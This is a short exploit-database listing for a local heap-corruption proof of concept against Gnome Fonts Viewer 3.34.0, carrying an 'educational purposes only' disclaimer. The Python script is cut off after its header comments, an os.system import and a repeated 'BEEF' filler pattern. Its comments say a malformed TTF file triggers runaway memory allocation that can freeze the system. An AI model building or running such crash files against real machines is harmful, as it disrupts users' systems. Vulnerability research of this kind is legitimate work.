Exploits / Vulnerability Discovered : 2020-09-11 |
Type : local |
Platform : linux
This exploit / vulnerability Gnome fonts viewer 3.34.0 heap corruption is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.
from os import system
this_pattern = "BEEF"*21125 # needs to be filled to len ~84500
# TTF file header (probably has some junk data in it) taken from MesloLGS
NF Regular.ttf